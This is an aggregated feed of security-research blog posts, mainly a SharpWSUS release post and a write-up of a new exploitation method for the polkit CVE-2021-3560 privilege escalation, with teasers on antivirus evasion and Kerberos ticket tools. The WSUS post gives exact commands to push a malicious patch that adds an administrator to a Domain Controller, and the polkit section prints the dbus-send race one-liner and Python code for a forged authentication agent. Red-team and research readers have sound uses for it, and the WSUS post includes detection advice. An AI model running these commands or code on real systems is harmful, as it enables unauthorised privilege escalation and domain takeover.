Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Perform a Nessus scan via port forwarding rules only

By: voidsec
13 March 2020 at 09:34

This post will be a bit different from the usual technical stuff, mostly because I was not able to find any reliable solution on Internet and I would like to help other people having the same doubt/question, it’s nothing advanced, it’s just something useful that I didn’t see posted before. During a recent engagement I […]

The post Perform a Nessus scan via port forwarding rules only appeared first on VoidSec.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerebos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the type of file commonly used by Mimikatz. The Base64 encoding make it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, sucha as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the havy lifting.

EncFSGui – GUI Wrapper around encfs for OSX

Introduction 3 weeks ago, I posted a rant about my frustration/concern related with crypto tools, more specifically the lack of tools to implement crypto-based protection for files on OSX, in a point-&-click user-friendly way.  I listed my personal functional and technical criteria for such tools and came to the conclusion that the industry seem to […]

The post EncFSGui – GUI Wrapper around encfs for OSX first appeared on Corelan Cybersecurity Research.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

Homemade Fuzzing Platform Recipe

By: voidsec
25 August 2021 at 13:11

It’s no secret that, since the beginning of the year, I’ve spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process. Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing […]

The post Homemade Fuzzing Platform Recipe appeared first on VoidSec.

Terminus Project launch.

By: ReWolf
29 November 2015 at 01:04
I would like to announce launch of my new web-based tool: Terminus Project. It’s automatically generated diff of Windows structures with nice (I hope!) presentation layer. Currently it contains only data gathered from NTDLL PDBs (281 dlls at the moment of writing this post), but it can be easily extended with other libraries. Idea behind […]

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

Statically encrypt strings in a binary with Keystone, LIEF and radare2/rizin

By: plowsec
11 April 2022 at 10:09
In our journey to try and make our payload fly under the radar of antivirus software, we wondered if there was a simple way to encrypt all the strings in a binary, without breaking anything. We did not find any satisfying solution in the literature, and the project looked like a fun coding exercise so … Continue reading Statically encrypt strings in a binary with Keystone, LIEF and radare2/rizin

Engineering antivirus evasion (Part III)

By: plowsec
19 April 2022 at 10:05
Previous blog posts addressed the issue of static artefacts that can easily be caught by security software, such as strings and API imports: This one provides an additional layer of obfuscation to target another kind of detection mechanism used to monitor a program’s activity, i.e userland hooks. As usual, source code was published at https://github.com/scrt/avcleaner … Continue reading Engineering antivirus evasion (Part III)

Introducing SharpWSUS

5 May 2022 at 09:00

Today, we’re releasing a new tool called SharpWSUS.  This is a continuation of existing WSUS attack tooling such as WSUSPendu and Thunder_Woosus. It brings their complete functionality to .NET, in a way that can be reliably and flexibly used through command and control (C2) channels, including through PoshC2.

The Background to SharpWSUS

During a recent red team engagement, a client wanted to see if a backup server could be compromised. The backup server was critical to the organisation and had consequently been the target of several rounds of red teaming and subsequent remediation, making compromise difficult. During this engagement, we found that the backup server had been removed from Active Directory (AD) and was also segmented from the network, making common lateral movement techniques unsuitable. The only common path seen was Remote Desktop Protocol (RDP) from certain hosts on the network to the target server with a local account. However, no local account was identified during the engagement. With this in mind, we looked for other avenues, for example leveraging servers that would need to connect to all other servers in the environment, and which would need to authenticate and issue code in some way. Enter Windows Server Update Services (WSUS).

Download SharpWSUS

github GitHub: https://github.com/nettitude/SharpWSUS

WSUS Introduction

WSUS is a Microsoft solution for administrators to deploy Microsoft product updates and patches across an environment in a scalable manner, using a method where the internal servers do not need to reach out to the internet directly. WSUS is extremely common within Windows corporate environments.

WSUS Architecture

Typically, the architecture of WSUS deployments is quite simple, although they can be configured in more complex ways. The most common deployment consists of one WSUS server within the corporate network. This server will reach out to Microsoft over HTTP and HTTPS to download Microsoft patches. After downloading these, the WSUS server will deploy the patch to clients as they check in to the WSUS server. Communication between the WSUS server and the clients will occur on port 8530 for HTTP and 8531 for HTTPS. An example of this deployment is below:

Diagram Description automatically generated

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

In a more complex deployment of WSUS, there may be one main WSUS server that communicates over the internet to Microsoft, then internally the main WSUS server pushes the patches out to other internal WSUS servers, which then deploy it to clients. In this scenario the WSUS server connecting to the internet would be known as the Upstream Server, and the WSUS servers that do not have internet access and get their patches from the Upstream Server would be Downstream Servers. An example diagram of this is below:

Diagram Description automatically generated

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

The most common deployment seen is a singular WSUS server deploying patches to all clients within the estate. This deployment means that one server in the environment can communicate to all servers and clients managed by WSUS, which make WSUS a very attractive target for bypassing network segmentation.

SharpWSUS

Attacks on WSUS are nothing new and there is already fantastic tooling out there for abusing WSUS for lateral movement such as WSUSPendu (https://github.com/AlsidOfficial/WSUSpendu), which is the PowerShell script that formed the basis for this tool. There is also another .NET tool publicly available called Thunder_Woosus (https://github.com/ThunderGunExpress/Thunder_Woosus) which aimed to take some functionality from WSUSPendu and port it to .NET.

SharpWSUS is a continuation of this tooling and aims to bring the complete functionality of WSUSPendu and Thunder_Woosus to .NET in a tool that can be reliably used through C2 channels and offers flexibility to the operator.

The flow of using SharpWSUS for lateral movement is as follows:

  • Locate the WSUS server and compromise it.
  • Enumerate the contents of the WSUS server to determine which machines to target.
  • Create a WSUS group.
  • Add the target machine to the WSUS group.
  • Create a malicious patch.
  • Approve the malicious patch for deployment.
  • Wait for the client to download the patch.
  • Clean up after the patch is downloaded.

Locating the WSUS server

The WSUS server that a client is using can be found by querying the following registry key:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate

This key will be present on any workstation or server managed through WSUS. Since the most common deployment is of a singular WSUS server, there is a good chance that the one in the key is the same one used for critical servers.

This can be enumerated through SharpWSUS using SharpWSUS.exe locate.

Text Description automatically generated

Enumerating the WSUS server

Once the WSUS server is compromised, SharpWSUS can be used to enumerate various details about the WSUS deployment, such as the computers being managed by the current server, the last time each computer checked in for an update, any Downstream Servers, and the WSUS groups.

This is done through the command SharpWSUS.exe inspect.

Text Description automatically generated

This provides the information needed to choose which machine to target in the environment. For example, within this environment this WSUS server managed the Domain Controllers such as bloredc2.blorebank.local. This is a common configuration of WSUS and often not treated as critical as Domain Controllers or other assets it manages. For this demo we will compromise the Domain Controller by adding a new local administrator.

Lateral Movement

A key consideration with WSUS lateral movement is that there is no way to control when a client checks in from the server. This means that once a patch is deployed the lateral movement won’t succeed until the client installs the update. Often times the client will check in for patches on a regular cycle, for example daily, but the patches won’t be installed until a patching day that might happen once a month. Some clients may be configured to install patches immediately if their priority level is high enough.

The first step of abusing WSUS is to create the malicious patch, which does have some limitations. When creating the patch there are various values that can be configured through the command line in SharpWSUS, allowing the operator to change the Indicators of Compromise (IoCs) of the patch. There is also a value for the payload and arguments. The payload must be a Microsoft signed binary and must point to a location on disk for the WSUS server to that binary.

While the need for a signed binary can limit some attack paths, there are still plenty of binaries that could be used such as PsExec.exe to run a command as SYSTEM, RunDLL32.exe to run a malicious DLL on a network share, MsBuild.exe to grab and execute a remote payload and more. The example in this blog will use PsExec.exe for code execution (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).

A patch leveraging PsExec.exe can be done with the following command:

SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"

Note that the way the quotes are escaped will change based on how you are executing the command. The escaping above is the command used within PoshC2.

Text Description automatically generated

Note the GUID returned from the command as this GUID is the Update ID of the patch and will be needed for further commands including cleaning up.

This malicious patch uses the PsExec.exe binary stored on the WSUS server which was uploaded through the C2. This patch will add a new user with the username WSUSDemo and grant them administrative rights over whichever machine it is installed on.

When the patch is created it will be visible in the WSUS console. The patch made can be seen below:

Graphical user interface, text, application Description automatically generated

If the patch is clicked, then more information can be seen:

Graphical user interface, text, application, email Description automatically generated

As part of the patch creation process, the binary used in the patch is also copied to the WSUS content location and called “wuagent.exe”. In this case the WSUS content location is “C:\UPDATES\WsusContent”, and the binary will be copied too “C:\UPDATES\wuagent.exe”. This allows it to be collected from the WSUS client. If the binary is executed the PsExec.exe help menu is seen, showing its just a copy of the Windows signed binary.

Text Description automatically generated

After the patch is made, the next steps are to create a group, add the target computer to the group and then deploy the patch to that group. This is due to WSUS patches being approved per WSUS group and not per machine. This means that for targeting a specific machine, it would be necessary to ensure that the machine is in a group with no other machines.

This can be done with one command in SharpWSUS through the following command:

SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group", where the updateid GUID is the one provided in the output of the create command.

Text Description automatically generated

This will check if the group “Demo Group” exists and create it if it doesn’t. It will then add the Domain Controller to the group and approve the malicious patch for the group.

You can check the group being created by running the inspect command again.

Graphical user interface, text Description automatically generated

This can also be seen in the WSUS console.

Graphical user interface, text, application Description automatically generated

After this it is a waiting game for the client to download and install the patch. SharpWSUS can be used to enumerate the status of the update:

SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local”, where the updateid is the same as before.

Text Description automatically generated

This value is pretty slow to update and can be unreliable. It is the same way using the WSUS console as well, it seems like WSUS is just not very efficient at tracking status. Until the target computer next checks in the value will not be populated so it will return the message above.

To speed up the demo the client will be forced to look for updates.

Graphical user interface, text, timeline Description automatically generated with medium confidence

This showed important updates to be installed…

Timeline Description automatically generated

… including the malicious patch.

Graphical user interface, application, Word Description automatically generated

Checking the local Administrators group of the DC to make sure there is no conflicting user:

Graphical user interface, text Description automatically generated

Then the patch is installed:

Text Description automatically generated with medium confidence

The new local administrator was made on the Domain Controller!

Graphical user interface, application Description automatically generated

Once the patch is installed on the target machine, the client will be able to see the following information.

Graphical user interface, text, application, email Description automatically generated

If they click on the title of the update they will be taken to the details for the patch.

Graphical user interface, text, application, email Description automatically generated

Once the client has checked in the status will be updated. This is still delayed and can take time to alter in the database. It seems the value will be updated when the computer next checks-in after its installed, which can take a few check-ins.

Text Description automatically generated

Once the patch is installed clean-up can be performed within SharpWSUS with the following command:

SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group”

Text Description automatically generated

This will decline the patch, delete the patch, remove the target from the group and delete the group.

Looking on the WSUS console it can be seen that the group is removed.

Graphical user interface, text, application Description automatically generated

If the patch is explicitly searched for within WSUS, it is no longer there.

Graphical user interface, text, application, email Description automatically generated

It should be noted that the patch binary “wuagent.exe” will remain on disk and is up to the operator to delete manually.

Protecting Against WSUS Abuse

Lateral movement through WSUS is not a new technique, however it is an option that will likely remain available to attackers for some time. Whilst preventing this access to local SYSTEM to abuse WSUS like this is not possible, it is possible to understand the attack path and take precautions.

The best defence against this would be segmenting the WSUS server from the network so that the server itself is more difficult to compromise, along with implementing a tiered WSUS structure with Upstream and Downstream Servers so that clients can be distributed between each relevant WSUS server.

Segmentation of the WSUS servers from the network makes the WSUS server more difficult to compromise and can force an attacker down a specific path that could be detected. Separating clients out to different WSUS servers limits where an attacker can laterally move to after compromising a downstream Server.

Various artefacts exist that may present an opportunity for detection:

  • A new WSUS group with one host is likely to be created. For more mass ransomware type attacks this may be all hosts in a new group.
    • The default group name within SharpWSUS is “InjectGroup”
  • The malicious patch itself and its metadata could all lead to detection opportunity if looking for patches outside of the normal Microsoft patches. The default patch created by SharpWSUS will have the following metadata:
    • Title: “SharpWSUS Update”
    • Date: “2021-09-26”
    • Rating: “Important”
    • KB: “5006103”
    • Description: “Install this update to resolve issues in Windows.”
    • URL: “https://www.nettitude.com”
  • When the patch is created, a Microsoft signed binary will be copied to the WSUS web root. If the WSUS content location was C:\Updates\WSUSContent for example, then the signed binary would be placed in C:\Updates\WUAgent.exe. This binary will not be removed after the patch is deleted, so this binary on disk could provide detection cases for WSUS being abused and may indicate what the abuse was (such as PsExec.exe, MsiExec.exe etc).
  • When the WSUS patch is approved, the user that approved it is stored and can be seen in the console. This appears to be often “WUS Server”, and that is what SharpWSUS will use. If your environment uses an alternate approval user then this could stand out.

Summary

WSUS is a core part of Windows environments and is very often deployed in a way that would allow an attacker to use it to bypass internal networking restrictions. This blog has not detailed any new attack techniques, but the release of SharpWSUS (https://github.com/nettitude/SharpWSUS) aims to aid with offensive security professionals utilising this attack path through C2 to demonstrate the risks and aid with improvement.

Download SharpWSUS

github GitHub: https://github.com/nettitude/SharpWSUS

The post Introducing SharpWSUS appeared first on Nettitude Labs.

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

By: RicterZ
27 May 2022 at 08:52
A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

 

English Version: http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation-en

0x01. The Vulnerability

PolicyKit CVE-2021-3560 是 PolicyKit 没有正确的处理错误,导致在发送 D-Bus 信息后立刻关闭程序后,PolicyKit 错误的认为信息的发送者为 root 用户,从而通过权限检查,实现提权而产生的漏洞。漏洞的利用方式如下:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply \
    /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
    string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!

以上命令的作用是在发送 D-Bus 信息后,在一个极短的时间差后利用 kill 命令杀死进程,经过多次尝试条件竞争后,可以实现以一个低权限用户添加一个拥有 sudo 权限的用户。

根据漏洞作者的描述和利用方法可知,此漏洞成功利用需要三个组件:

  1. Account Daemon,此服务用来添加用户;
  2. Gnome Control Center,此服务会用 org.freedesktop.policykit.imply 修饰 Account Daemon 的方法;
  3. PolicyKit ≥ 0.113。

其中 Account Daemon 和 Gnomo Control Center 在非桌面版的系统、Red Hat Linux 等系统中并不存在,这无疑减小了漏洞的利用覆盖面。

但是通过对于此漏洞的原理深入研究,我发现漏洞利用并没有特别大的限制,仅存在 PolicyKit 和一些基础 D-Bus 服务(比如 org.freedesktop.systemd1)的系统中仍然可以成功利用。在进行研究的过程中,发现实现利用需要涉及比较多的知识点,需要深入理解此漏洞的原理及 PolicyKit 的相关认证机制和流程。本文章旨在将整体的研究方法尽可能详细的描述出来,如有错误请指正。

0x02. Do Really Need an Imply Annotated Action

在漏洞作者的文章中(https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)明确的写道:

The authentication bypass depends on the error value getting ignored. It was ignored on line 1121, but it's still stored in the error parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named implied_error, which is ignored when implied_result isn't null. That's the crucial step that makes the bypass possible.

大体含义就是必须要有 org.freedesktop.policykit.imply 修饰后的方法才能实现认证绕过。根据文章中的 PoC 来看,这一点确实是母庸质疑的。具体原因和漏洞原理结合的非常紧密,可以通过查看代码来理解。首先先看一下 CVE-2021-3560 的漏洞函数,代码基于 Github 上的 polkit 0.115 版本:

static gboolean
polkit_system_bus_name_get_creds_sync (PolkitSystemBusName           *system_bus_name,
               guint32                       *out_uid,
               guint32                       *out_pid,
               GCancellable                  *cancellable,
               GError                       **error)
{

  // ...
  g_dbus_connection_call (connection,
        "org.freedesktop.DBus",       /* name */
        "/org/freedesktop/DBus",      /* object path */
        "org.freedesktop.DBus",       /* interface name */
        "GetConnectionUnixUser",      /* method */
        // ...
        &data);
  g_dbus_connection_call (connection,
        "org.freedesktop.DBus",       /* name */
        "/org/freedesktop/DBus",      /* object path */
        "org.freedesktop.DBus",       /* interface name */
        "GetConnectionUnixProcessID", /* method */
        // ...
        &data);

  while (!((data.retrieved_uid && data.retrieved_pid) || data.caught_error))
    g_main_context_iteration (tmp_context, TRUE);

  if (out_uid)
    *out_uid = data.uid;
  if (out_pid)
    *out_pid = data.pid;
  ret = TRUE;

  return ret;
}


polkit_system_bus_name_get_creds_sync 函数调用了两个 D-Bus 方法后,没有处理 data.caugh_error,直接设置了 out_uiddata.uid,又由于 data.uid 为 NULL,从而导致 out_uid 为 NULL,也就是 0,为 root 用户的 uid,从而错误的认为这个进程为 root 权限进程。

但是需要注意的是,在遇到错误时,data.error 会被设置为错误的信息,所以这里需要接下来的函数只验证了 ret 是否为 TRUE,而不去验证有没有错误。幸运的是,PolicyKit 中一个用途非常广泛的函数 check_authorization_sync就没有验证:

static PolkitAuthorizationResult *
check_authorization_sync (PolkitBackendAuthority         *authority,
                          PolkitSubject                  *caller,
                          PolkitSubject                  *subject,
                          const gchar                    *action_id,
                          PolkitDetails                  *details,
                          PolkitCheckAuthorizationFlags   flags,
                          PolkitImplicitAuthorization    *out_implicit_authorization,
                          gboolean                        checking_imply,
                          GError                        **error)
{
  // ...
  user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                         subject, NULL,
                                                                         error);
  /* special case: uid 0, root, is _always_ authorized for anything */
  if (identity_is_root_user (user_of_subject)) {
      result = polkit_authorization_result_new (TRUE, FALSE, NULL);
      goto out;
  }
  // ...
  if (!checking_imply) {
      actions = polkit_backend_action_pool_get_all_actions (priv->action_pool, NULL);
      for (l = actions; l != NULL; l = l->next) {
           // ...
           imply_action_id = polkit_action_description_get_action_id (imply_ad);
           implied_result = check_authorization_sync (authority, caller, subject,
                                                      imply_action_id,
                                                      details, flags,
                                                      &implied_implicit_authorization, TRUE,
                                                      &implied_error);
           if (implied_result != NULL) {
           if (polkit_authorization_result_get_is_authorized (implied_result)) {
               g_debug (" is authorized (implied by %s)", imply_action_id);
               result = implied_result;
               /* cleanup */
               g_strfreev (tokens);
               goto out;
           }
  // ...

这个函数有两处问题,第一个就是第一次调用 polkit_backend_session_monitor_get_user_for_subject 的时候直接返回 uid 为 0 的信息,然后直接通过认证,第二次是在检查 imply action 时,循环调用 check_authorization_sync 后再次遇到 polkit_backend_session_monitor_get_user_for_subject 返回 uid 为 0 的信息。所以此函数存在两个条件竞争的时间窗口:

check_authorization_sync 
-> polkit_backend_session_monitor_get_user_for_subject 
 -> return uid = 0

check_authorization_sync
 -> check_authorization_sync
  -> polkit_backend_session_monitor_get_user_for_subject 
   -> return uid = 0

漏洞作者分析到这里时,发现第一个竞争时间窗口并不能成功,因为后续调用 check_authorization_sync的函数都检查了错误信息,所以只能通过第二个时间窗口进行利用,也就是需要一个被 org.freedesktop.policykit.imply 修饰过的 action。首先解释下什么是 org.freedesktop.policykit.imply 修饰。

PolicyKit 的 action policy 配置文件通常在 /usr/share/polkit-1/actions/ 目录下,文件的内容如下所示:

<?xml version="1.0" encoding="UTF-8"?> <!--*-nxml-*-->
<!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
        "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">

<policyconfig>
        <vendor>The systemd Project</vendor>
        <vendor_url>http://www.freedesktop.org/wiki/Software/systemd</vendor_url>

        <action id="org.freedesktop.systemd1.manage-unit-files">
                <description gettext-domain="systemd">Manage system service or unit files</description>
                <message gettext-domain="systemd">Authentication is required to manage system service or unit files.</message>
                <defaults>
                        <allow_any>auth_admin</allow_any>
                        <allow_inactive>auth_admin</allow_inactive>
                        <allow_active>auth_admin_keep</allow_active>
                </defaults>
                <annotate key="org.freedesktop.policykit.imply">org.freedesktop.systemd1.reload-daemon org.freedesktop.systemd1.manage-units</annotate>
        </action>

        <action id="org.freedesktop.systemd1.reload-daemon">
                <description gettext-domain="systemd">Reload the systemd state</description>
                <message gettext-domain="systemd">Authentication is required to reload the systemd state.</message>
                <defaults>
                        <allow_any>auth_admin</allow_any>
                        <allow_inactive>auth_admin</allow_inactive>
                        <allow_active>auth_admin_keep</allow_active>
                </defaults>
        </action>

</policyconfig>

可以发现,org.freedesktop.systemd1.manage-unit-files 这个 action 拥有 org.freedesktop.policykit.imply 修饰,这个修饰的意义是,当一个 subject 拥有 org.freedesktop.systemd1.reload-daemon 或者 org.freedesktop.systemd1.manage-units 权限时,也同时拥有此项权限。所以被修饰过的方法基本上可以视作为和修饰方法等价的,这也就是这个修饰的作用。

话说回来,在实际上,被此漏洞所影响的上层函数并不止 check_authorization_sync ,如下所有函数都会被这个漏洞所影响:

  1. polkit_system_bus_name_get_creds_sync
  2. polkit_backend_session_monitor_get_user_for_subject
  3. check_authorization_sync

通过搜索代码,我发现了一个对我而言十分熟悉的函数调用了 polkit_backend_session_monitor_get_user_for_subject 函数:polkit_backend_interactive_authority_authentication_agent_response

static gboolean
polkit_backend_interactive_authority_authentication_agent_response (PolkitBackendAuthority   *authority,
                                                              PolkitSubject            *caller,
                                                              uid_t                     uid,
                                                              const gchar              *cookie,
                                                              PolkitIdentity           *identity,
                                                              GError                  **error)
{

  // ...
  identity_str = polkit_identity_to_string (identity);
  g_debug ("In authentication_agent_response for cookie '%s' and identity %s",
           cookie,
           identity_str);
  user_of_caller = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                        caller, NULL,
                                                                        error);

  /* only uid 0 is allowed to invoke this method */
  if (!identity_is_root_user (user_of_caller)) {
      goto out;
  }
  // ...

这个方法是 PolicyKit 用来处理 Authentication Agent 调用的 AuthenticationAgentResponseAuthenticationAgentResponse2 方法的。那么,什么是 Authentication Agent,它又拥有什么作用呢?

0x03. What is Authentication Agent

在日常使用 Linux 的时候,如果不是利用 root 账号登录桌面环境,在执行一些需要 root 权限的操作时,通常会跳出一个对话框让你输入密码,这个对话框的程序就是 Authentication Agent:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

在命令行中,同样也有 Authentication Agent,比如 pkexec 命令:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

一个 Authentication Agent 通常为 suid 程序,这样可以保证调用 PolicyKit 的授权方法时的调用方(caller)为 root,而来自 root 用户的方法调用是可以信任的。Authencation Agent的认证流程如下所示:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation
  1. Client 在需要提升权限时,会启动 setuid 的 Authentication Agent;
  2. Authentication Agent 会启动一个 D-Bus 服务,用来接收 PolicyKit 的相关认证调用;
  3. Authentication Agent 会去 PolicyKit 注册自己,来接管对于客户端程序调用的 D-Bus 方法的认证请求: CheckAuthorization
  4. 当收到 CheckAuthorization 请求时,PolicyKit 会调用 Authencation Agent 的 BeginAuthentication 方法;
  5. Authentication Agent 接收到方法调用后,会要求用户输入密码进行认证;
  6. Authentication Agent 验证密码没有问题,则会调用 PolicyKit 提供的 AuthenticationAgentResponse 方法;
  7. PolicyKit 收到 AuthenticationAgentResponse 方法调用后,会检查调用方是不是 root 权限,接着会检查其他信息(cookie);
  8. 检查无误后,PolicyKit 对于 D-Bus Service 的 CheckAuthorization 方法返回 TRUE,表示认证通过;
  9. D-Bus Service 收到返回后,允许执行用户所调用的方法。

虽然流程较为复杂,但是不难发现,整个流程的信任保证主要是在第 7 步中验证 AuthenticationAgentResponse 的调用方是否为 root。但是由于 CVE-2021-3560 的存在,这个信任被打破了。所以我们可以通过伪造 AuthenticationAgentResponse 的调用方,来完成整个认证流程,实现任意 D-Bus Service 方法的调用。

0x04. Write Your Agent

利用 dbus-python 和相关 example 代码,我们可以实现一个 Authencation Agent 的基本骨架:

import os
import dbus
import dbus.service
import threading

from gi.repository import GLib
from dbus.mainloop.glib import DBusGMainLoop


class PolkitAuthenticationAgent(dbus.service.Object):
    def __init__(self):
        bus = dbus.SystemBus(mainloop=DBusGMainLoop())
        self._object_path = '/org/freedesktop/PolicyKit1/AuthenticationAgent'
        self._bus = bus
        with open("/proc/self/stat") as stat:
            tokens = stat.readline().split(" ")
            start_time = tokens[21]

        self._subject = ('unix-process',
                         {'pid': dbus.types.UInt32(os.getpid()),
                          'start-time': dbus.types.UInt64(int(start_time))})

        bus.exit_on_disconnect = False
        dbus.service.Object.__init__(self, bus, self._object_path)
        self._loop = GLib.MainLoop()
        self.register()
        print('[*] D-Bus message loop now running ...')
        self._loop.run()

    def register(self):
        proxy = self._bus.get_object(
                'org.freedesktop.PolicyKit1',
                '/org/freedesktop/PolicyKit1/Authority')
        authority = dbus.Interface(
                proxy,
                dbus_interface='org.freedesktop.PolicyKit1.Authority')
        authority.RegisterAuthenticationAgent(self._subject,
                                              "en_US.UTF-8",
                                              self._object_path)
        print('[+] PolicyKit authentication agent registered successfully')
        self._authority = authority

    @dbus.service.method(
            dbus_interface="org.freedesktop.PolicyKit1.AuthenticationAgent",
            in_signature="sssa{ss}saa{sa{sv}}", message_keyword='_msg')
    def BeginAuthentication(self, action_id, message, icon_name, details,
                            cookie, identities, _msg):
        print('[*] Received authentication request')
        print('[*] Action ID: {}'.format(action_id))
        print('[*] Cookie: {}'.format(cookie))

        ret_message = dbus.lowlevel.MethodReturnMessage(_msg)
        message = dbus.lowlevel.MethodCallMessage('org.freedesktop.PolicyKit1',
                                                  '/org/freedesktop/PolicyKit1/Authority',
                                                  'org.freedesktop.PolicyKit1.Authority',
                                                  'AuthenticationAgentResponse2')
        message.append(dbus.types.UInt32(os.getuid()))
        message.append(cookie)
        message.append(identities[0])
        self._bus.send_message(message)


def main():
    threading.Thread(target=PolkitAuthenticationAgent).start()


if __name__ == '__main__':
    main()


接着尝试增加代码,进行调用:

def handler(*args):
    print('[*] Method response: {}'.format(str(args)))


def set_timezone():
    print('[*] Starting SetTimezone ...')
    bus = dbus.SystemBus(mainloop=DBusGMainLoop())
    obj = bus.get_object('org.freedesktop.timedate1', '/org/freedesktop/timedate1')
    interface = dbus.Interface(obj, dbus_interface='org.freedesktop.timedate1')
    interface.SetTimezone('Asia/Shanghai', True, reply_handler=handler, error_handler=handler)


def main():
    threading.Thread(target=PolkitAuthenticationAgent).start()
    time.sleep(1)
    threading.Thread(target=set_timezone).start()

运行程序:

dev@test:~$ python3 agent.py
[+] PolicyKit authentication agent registered successfully
[*] D-Bus message loop now running ...
[*] Received authentication request
[*] Action ID: org.freedesktop.timedate1.set-timezone
[*] Cookie: 3-31e1bb8396c301fad7e3a40706ed6422-1-0a3c2713a55294e172b441c1dfd1577d
[*] Method response: (DBusException(dbus.String('Permission denied')),)

同时 PolicyKit 的输出为:

** (polkitd:186082): DEBUG: 00:37:29.575: In authentication_agent_response for cookie '3-31e1bb8396c301fad7e3a40706ed6422-1-0a3c2713a55294e172b441c1dfd1577d' and identity unix-user:root
** (polkitd:186082): DEBUG: 00:37:29.576: OUT: Only uid 0 may invoke this method.
** (polkitd:186082): DEBUG: 00:37:29.576: Authentication complete, is_authenticated = 0
** (polkitd:186082): DEBUG: 00:37:29.577: In check_authorization_challenge_cb
  subject                system-bus-name::1.6846
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 0

